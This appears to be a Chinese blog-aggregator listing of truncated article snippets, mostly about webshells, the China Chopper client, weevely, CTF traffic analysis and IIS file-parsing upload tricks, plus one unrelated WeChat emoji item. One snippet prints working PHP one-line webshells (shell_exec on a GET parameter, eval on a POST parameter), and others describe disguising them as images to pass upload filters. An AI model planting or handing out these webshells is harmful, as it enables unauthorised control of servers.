最近做微信公众号时发现微信ChatEmoji表情与接受的消息显示表情的问题, 微信表情后面的ChatEmoji显示不出,花了一些时间整理,把pc和手机的表情全部都整理了, 由于有两百多个显示可能有点长,所以都放在了QQ交流群::929412850 ChatEmoji图片和对应的ChatEmoji文字 ...
分类:
微信 时间:
2019-03-12 23:53:49
阅读次数:
256
这里的中国菜刀不是指切菜做饭的工具,而是中国安全圈内使用非常广泛的一款Webshell管理工具,想买菜刀请出门左拐东门菜市场王铁匠处。中国菜刀用途十分广泛,支持多种语言,小巧实用,据说是一位中国军人退伍之后的作品。日前,国外安全公司Fireeye对这款工具进行了详细的剖析,可以说是一部非常nice的 ...
分类:
Web程序 时间:
2019-02-27 16:15:13
阅读次数:
280
解压之后得到了一个流量包,只有不到10KB,美滋滋 先抓重点,过滤出http,只有6条数据记录,3条post,3条response,3条post都是一样的 随便打开一条pos 是一个assert断言,断言内容是一串base64加密的字符串(最后的%3D先解码为=) 得到了一串php代码 就是说打印一 ...
分类:
其他好文 时间:
2019-02-04 12:50:34
阅读次数:
309
php经典一句话: <?php echo shell_exec($_GET['cmd']);?> 中国菜刀:官网:www.maicaidao.co原理:上传一句话(<?php @eval($_POST['我是密码']);?>)至服务器端,再用中国菜刀客户端(图形化界面)去连接服务器 webacoo( ...
分类:
Web程序 时间:
2019-02-02 15:47:49
阅读次数:
174
菜刀添加cookie的方法。 首先编写了一个需要cookie才能访问的木马。 然后当使用菜刀直接连接后,访问文件时,返回false如下: 接着在主界面,选中url,右击选择浏览网站。 然后再该界面上,右击选择扩展功能: 然后再输入框中输入id=1,点击修改Cookies[127.0.0.1],则可以 ...
分类:
其他好文 时间:
2019-01-19 00:48:27
阅读次数:
455
上面这问题问得好 1 不知道大家有没碰到有些Strus2站点 上传JSP后访问404 或者503 注意我说的是404或503不是403(要是403换个css/img等目录或许可以) 但对于明明在web目录下放了jsp访问却404,怎么办?上exe 弄它啊 怎么办2 估计大部分人碰到的是可以上传小马无 ...
分类:
Web程序 时间:
2019-01-12 22:54:45
阅读次数:
441
随便发一个允许上传的文件,BP抓包,发现网站是用asp写的2.上传图片马,连接菜刀无法解析 3.先猜测大漏洞IIS下文件解析漏洞,这题主要考察怎么创建文件夹的。 例如:在a.asp文件夹下,里面的所有文件都将被看做asp文件执行,举例:123.jpg在a.asp文件夹下就会被看做123.jpg.as ...
分类:
Web程序 时间:
2019-01-12 15:21:09
阅读次数:
287
-前言weevely是一款使用python编写的webshell工具(集webshell生成和连接于一身,仅用于安全学习教学之用,禁止非法用途),可以算作是linux下的一款菜刀替代工具(限于php),在linux上使用时还是很给力的,就是某些模块在windows上无法使用,总的来说还是非常不错的一 ...
分类:
Web程序 时间:
2019-01-06 19:21:24
阅读次数:
383
我们讲的是***过程中用到的代码,不是你***过程中准备的软件代码。我们讲的是现在应当能成功***的。不是你已经装好后门你去连接了,像菜刀服务端、跨站代码等。真正的dir溢出医科圣手tombkeeper,在知乎上举过例子。在简体中文版Windows2000SP4的命令提示符下执行这条dir命令会导致系统锁屏:diraux.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
分类:
其他好文 时间:
2018-12-14 00:56:08
阅读次数:
151
有些网站我们在拿shell的时候,会要用到上传文件,但是有的时候都会有过滤,如果只是上传.asp .php结尾的文件的话系统是不会给你上传的,那么这个时候我们通常会利用一些其他的思路,比如说iis6中的解析漏洞,把一句话放到图片里面,写成1.asp;.jpg 1.asp;.jpg的格式上传上去,这样 ...
分类:
其他好文 时间:
2018-12-05 22:56:58
阅读次数:
436